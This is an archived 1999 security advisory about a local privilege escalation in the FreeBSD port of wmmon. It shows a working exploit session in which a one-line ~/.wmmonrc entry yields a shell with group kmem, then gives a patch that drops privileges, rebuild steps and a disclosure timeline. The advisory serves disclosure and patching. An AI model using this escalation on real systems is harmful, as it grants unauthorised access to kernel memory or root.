wmmon.freebsd.txt

`Posted Tuesday, December 21, 1999 - 16:41 by reid:  
Steve Reid wrote:  
Wmmon is a popular program for monitoring CPU load and other system  
utilization. It runs as a dockapp under WindowMaker.  
  
The FreeBSD version of this program has a feature that can be trivially  
exploited to gain group kmem in recent installs, or user root in really  
old installs. This affects the FreeBSD version because under FreeBSD the  
program must be installed setgid kmem or setuid root in order to access  
system load information through the memory devices. The Linux version  
should not be vulnerable because it reads information through procfs  
which requires no special privileges.  
  
Exploit:  
% id  
uid=1000(steve) gid=1000(steve) groups=1000(steve)  
% echo 'left /bin/sh' > ~/.wmmonrc  
% wmmon -display myworkstation.evilhacker.net:0.0  
Monitoring 2 devices for activity.  
{Left-click on the little window that appears}  
current stat is :1  
$ id  
uid=1000(steve) gid=1000(steve) egid=2(kmem) groups=2(kmem), 1000(steve)  
  
Here is a patch:  
  
--- work/wmmon.app/wmmon/wmmon.c.old Thu Dec 2 02:06:55 1999  
+++ work/wmmon.app/wmmon/wmmon.c Thu Dec 2 04:20:22 1999  
@@ -318,6 +318,8 @@  
  
if (kvmd==NULL) kvmd = kvm_openfiles(NULL, NULL, NULL, O_RDONLY,  
errbuf);  
if (kvmd==NULL) { fprintf(stderr, "kvm_openfiles: %s\n", errbuf);  
exit(errno); }  
+ if (setgid(getgid()) != 0) exit(1); /* We're sgid kmem. Give up  
privs. */  
+ if (setuid(getuid()) != 0) exit(1); /* If we're suid, give that up  
too. */  
if (kvmd) {  
if (kvm_nlist(kvmd, nl) >= 0) {  
struct nlist *nlp;  
  
To fix your wmmon binary save the above as wmmon.patch and do this:  
  
cd /usr/ports/sysutils/wmmon  
make patch  
patch < wmmon.patch  
make  
su root  
make deinstall  
make reinstall  
  
The exploit and patch were tested with wmmon 1.0.b2 installed using the  
ports tree. Standard disclaimers apply.  
I first emailed the FreeBSD wmmon port maintainer about this back in  
February. At that time the program was installed setuid root, giving  
easy access to user root instead of just group kmem. There was also a  
buffer overflow on the $HOME variable which could probably be used to  
access the memory device file descriptors even if privileges were  
relinquished (which they weren't). The port maintainer acknowledged my  
email and a message warning of a security vulerability was placed in the  
pkg/DESCR file but as far as I could tell that was all that was done for  
some weeks. The port maintainer changed during that time and I guess my  
email got lost in the switch. I forgot about it until a few weeks ago  
when I checked the port again. The warning message is gone, the buffer  
overflow on $HOME is fixed, and the program now installs setgid kmem  
instead of setuid root. The problem still exists, it has just been  
reduced from a root exploit to kmem. On Dec. 2nd I again emailed the  
port maintainer (now a different person) and he acknowledged my email,  
but as of Dec. 20th the port still appears to be vulnerable.  
  
---------------------------------  
`